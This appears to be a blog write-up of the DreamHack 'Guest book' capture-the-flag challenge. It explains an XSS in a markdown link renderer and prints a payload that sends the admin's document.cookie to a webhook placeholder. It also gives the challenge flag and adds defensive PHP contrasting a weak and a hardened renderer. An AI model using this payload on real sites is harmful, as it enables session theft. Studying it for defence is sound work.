DreamHack - [Guest book challenge writeup]

There is an XSS vulnerability in the markdown link regex replace. When the link is sent to the admin, the <a> tag is not automatically clicked. So I did a Google search for an <a> tag auto-click vulnerability, and found this link.

It recommends the payload

<a href="#" autofocus="true" onfocus="alert('xss')">hello world!</a>

using autofocus and onfocus.

So we craft a similar payload.

[uia](javascript:location.href=`{webhook_url}?leak=`+document.cookie' autofocus='true' onfocus='location.href=this.href')

Remember to wrap the autofocus and onfocus values in single quotes; double quotes are HTML-escaped. I don’t know why, but the most likely reason is the PHP version being < 8.1.0; see the Changelog section of php-htmlentities.

Send the payload to the report section and we get the flag.

🚩 FLAG: DH{26763025e32e6b24fedfc3206054d6a7}
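
For the defensive side of the quoting behaviour described above, here is an added example (not code from the challenge or from the original post) that puts an assumed reconstruction of the weak renderer next to a hardened one. The function names, the single-quoted `href` template and the sample inputs are assumptions made for illustration; the sample inputs are constructed and inert.

```php
<?php
// Added illustration. render_link_weak() is an ASSUMED reconstruction of the
// pattern the write-up describes, not the challenge's actual source.

// Weak: ENT_COMPAT (the default before PHP 8.1.0) escapes " but leaves '
// untouched, while the template delimits href with single quotes.
function render_link_weak(string $md): string {
    $safe = htmlspecialchars($md, ENT_COMPAT | ENT_HTML401, 'UTF-8');
    $tpl  = '<a href=\'$2\'>$1</a>';
    return preg_replace('/\[([^\]]*)\]\(([^)]*)\)/', $tpl, $safe) ?? $safe;
}

// Hardened: escape both quote styles, refuse whitespace inside the URL,
// allow only http/https, and emit a double-quoted attribute.
function render_link_hardened(string $md): string {
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    $safe  = htmlspecialchars($md, $flags, 'UTF-8');
    $out   = preg_replace_callback(
        '/\[([^\]]*)\]\(([^)\s]*)\)/',
        function (array $m) use ($flags): string {
            // $m[2] is already escaped; decode only to inspect the scheme.
            $url    = htmlspecialchars_decode($m[2], $flags);
            $scheme = strtolower((string) parse_url($url, PHP_URL_SCHEME));
            if (!in_array($scheme, ['http', 'https'], true)) {
                return $m[0]; // stays as escaped text, never becomes a link
            }
            return '<a href="' . $m[2] . '" rel="noopener noreferrer">'
                 . $m[1] . '</a>';
        },
        $safe
    );
    return $out ?? $safe;
}

// Constructed inputs: an attribute breakout via ', a non-http scheme,
// and an ordinary link.
$samples = [
    "[hi](https://example.test/' data-injected='1)",
    "[x](javascript:0)",
    "[ok](https://example.test/page?a=1&b=2)",
];
foreach ($samples as $s) {
    echo "input:    $s\n";
    echo "weak:     " . render_link_weak($s) . "\n";
    echo "hardened: " . render_link_hardened($s) . "\n\n";
}
```

On PHP 8.1.0 and later, `htmlspecialchars()` called without flags already defaults to `ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML401`, but the scheme allowlist is still needed because escaping alone does not stop a `javascript:` URL.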

https://minhi1.github.io/minhi1-blogs/posts/dreamhack/level-5/guest-book/
Author: Minhi1
Published at: 2025-12-25
License: CC BY-NC-SA 4.0